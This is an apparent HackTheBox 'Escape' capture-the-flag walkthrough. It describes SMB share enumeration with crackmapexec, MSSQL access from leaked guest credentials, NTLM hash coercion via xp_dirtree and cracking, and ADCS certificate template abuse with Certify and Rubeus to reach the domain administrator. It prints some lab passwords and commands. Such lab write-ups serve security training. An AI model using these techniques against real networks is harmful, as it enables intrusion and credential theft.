HACKTHEBOX — ESCAPE
Introduction of the Box
Escape is a very Windows-centeric box focusing on MSSQL Server and Active Directory Certificate Services (ADCS). I’ll start by finding some MSSQL creds on an open file share. With those, I’ll use xp_dirtree to get a Net-NTLMv2 challenge/response and crack that to get the sql_svc password. That user has access to logs that contain the next user’s creds. To get administrator, I’ll attack active directory certificate services, showing both certify.
RECONNAISSANCE
“RustScan” tends to find many open TCP ports and confirms that kerberos is running on the network.
From the results the network looks like a windows domain controller, with port 445 (SMB), 135/139 (NetBIOS), 389 (LDAP) and 5985 (WinRM) listening on the DC’s and also in this infrastructure you are able to see that there is a MSSQL (Port 1433) service running.
Running the Nmap script on port 1433 to gain more information.
The scan shows that sequel.htb is the domain name and dc.sequel.htb is the domain controller of the network. I’ll be adding them to my /etc/hosts file.
SMB — TCP 443
I’ll enumerate the SMB service using crackmapexec without any credentials and it fails to list ou the shares.
root@snowdox$ crackmapexec smb 10.10.11.202 — shares
SMB 10.10.11.202 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
But now I’ll be giving a random username and an empty password for the credential parameters.
root@snowdox$ crackmapexec smb 10.10.11.202 -u apt0xsnowdox -p ‘’ — shares
SMB 10.10.11.202 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\0xdfnotreallyausername: SMB 10.10.11.202 445 DC [+] Enumerated shares
SMB 10.10.11.202 445 DC Share Permissions Remark SMB 10.10.11.202 445 DC — — — — — — — — — — — —
SMB 10.10.11.202 445 DC ADMIN$ Remote Admin
SMB 10.10.11.202 445 DC C$ Default share
SMB 10.10.11.202 445 DC IPC$ READ Remote IPC
SMB 10.10.11.202 445 DC NETLOGON Logon server share
SMB 10.10.11.202 445 DC Public READ
SMB 10.10.11.202 445 DC SYSVOL Logon server share
Since the ‘Public’ Share is readable I’ll connect using SMBCLIENT tool with ‘-N’ for Null password and get a PDF file which is in the SMB Server.
SQL Server Procedures.pdf
After getting the PDF file from the SMB Server open it via evince utility and it consists information about the MSSQL Service.
When you scroll down you are given credentials to access the MSSQL server as a Guest User.
As the above image shows the username is ‘PublicUser’ and the password ‘GuestUserCantWrite1’.
MSSQL
To connect to the MSSQL server I’ll use mssqlclient.py from the Impacket Library using the credentials I found from the PDF file.
From this article there are many payloads we can use to enumerate the server.
Shell as sql_svc
Since we have access to the MSSQL server we need to get a shell somehow so I thought of using the ‘xp_dirtree’ function to execute a command on the server.
First I started a smbserver to host a virtual share on the attacking network
Next I connected to the virtually created share via the xp_dirtree function
Going back to the smbserver we are welcomed with a NTLM hash of the user ‘sql_svc’.
Cracking the Challenge Response
I’ll use johntheripper to crack the hash. Check this following article to learn how to crack hashes using JohnTheRipper
It cracks the password to ‘REGGIE1234ronnie’ rapidly.
WINRM — 5986
With the credentials I found, now I can get a shell via Evil-WinRM as sql_svc user. Install Evil-WinRM using this guide.
Shell as Ryan.Cooper
Enumeration
In the home directory of the sql_svc user is empty after a bit of enumeration on the system I was able to find a directory which has the log files of the MSSQL server.
and in the Logs directory there is a folder name “ERRORLOG.BAK”.
I had to crawl down the logs in the file to find credentials for the user Ryan.
After finding the credentials for the user I used Evil-WinRM to get access to the user Ryan.
Since I’ve got no idea about the configurations done on this user I uploaded winPeas.exe binary to find any potential vulnerabilities,misconfigurations or running services I could exploit.
I thoroughly searched through the result of winPeas.exe and found that Certificate Service is running in the Active Directory.
After identifying the service I used certify.exe binary to find any vulnerable certificates in the AD network.
Identify Vulnerable Template
So I uploaded the binary via Evil-WinRm to the victim machine.
Using the Certify.exe binary I executed it to find
The binary was able to find a vulnerable template with the CA name and the domain name with all the enrollement rights.
Abuse Template with Certify & Rubeus
I will now request a certificate with an alternatice name of administrator which returns a cert.pem. From this blog you can find more infoamtion on how to perform this attack
I’ll copy the private certificate into a file in my machine in the as a .pfx file since rubeus could only understand that format.
Now I’ll upload a copy of the cert.pfx and a rubeus.exe binary to the shell we got via Evil-WinRM.
I will run the ‘asktgt’ command by passing the cert.pfx to get a TGT as the administrator.
Here I used the /getcredentials prompt to the NTLM hash of the administrator so that we could login to his account via Evil-WinRM using the hash.
Entering the hash into the tool I was able to login as the Administrator into the machine.
ADDITIONAL
We are able to use “CertPy” to remotely get the Private key and perform the same procedures we did using certify.exe
Hope you’ll learnt something about the ADCS Attack in the Active Directory, stay tuned for more walkthroughs as well as my research papers.
Peace!
